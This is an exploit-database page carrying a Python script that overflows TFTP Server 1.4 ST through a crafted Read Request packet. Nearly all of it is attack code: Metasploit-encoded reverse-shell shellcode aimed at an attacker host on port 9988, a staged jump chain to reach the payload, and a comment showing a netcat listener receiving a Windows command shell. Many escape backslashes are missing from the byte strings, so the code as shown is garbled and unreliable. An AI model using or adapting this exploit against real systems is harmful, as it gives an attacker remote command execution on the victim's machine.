[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit
# Published : 2012-01-10
# Author :
# Previous Title : Sysax Multi Server 5.50 Create Folder BOF
# Next Title : McAfee SaaS MyCioScan ShowReport Remote Command Execution


#!/usr/bin/python

#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow)                               #
# OS: Windows XP PRO SP3                                                    #
# Author: b33f                                                              #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise...                                #
#                                                                           #
# This tftp service have been pwned extensively:                            #
# (1) Muts ==> WRQ Overflow                                                 #
#     http://www.exploit-db.com/exploits/5314/                              #
# (2) Molotov ==> WRQ Overflow                                              #
#     http://www.exploit-db.com/exploits/10542/                             #
# (3) tixxDZ ==> ERROR Overflow                                             #
#     http://www.exploit-db.com/exploits/5563/                              #
#                                                                           #
# Vulnerable software:                                                      #
# http://www.exploit-db.com/application/5314/                               #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read     #
# Request (RRQ) packet can also trigger a buffer overflow...                #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear  #
# as expected....                                                           #
#                                                                           #
# root@bt:~# nc -lvp 9988                                                   #
# listening on [any] 9988 ...                                               #
# 192.168.111.128: inverse host lookup failed: Unknown server error         #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072        #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:Program FilesTFTPServer>                                              #
#---------------------------------------------------------------------------#

import socket
import sys

host = '192.168.111.128'
port = 69

try:
      s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
      
except:
      print "socket() failed"
      sys.exit(1)

#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b 'x00'
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
shell = (
"xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1"
"x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97"
"xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f"
"x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d"
"xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92"
"xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94"
"xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50"
"xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a"
"xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed"
"xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff"
"x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec"
"xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5"
"xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0"
"xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09"
"x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51"
"xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e"
"x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c"
"x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06"
"x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1"
"x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40"
"xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f"
"x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22"
"xafx96x42xdfxddx87x26xdfx72xa7x62")

#---------------------------------------------------------------------------#
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR                               #
#             => 3-byte overwrite using the mandatory protocol null-byte.   #
# (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump.  #
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer.          #
# (4) Stage4: reverse shell port 9988 - size 341                            #
#---------------------------------------------------------------------------#

stage4 = "x90"*50 + shell
stage3 = "xE9x2ExFAxFFxFF"
stage2 = "xEBxF9x90x90"
stage1 = "x05x96x40"

filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1


mode = "netascii"
youlose = "x00x01" + filename + "x00" + mode + "x00"
s.sendto(youlose, (host, port))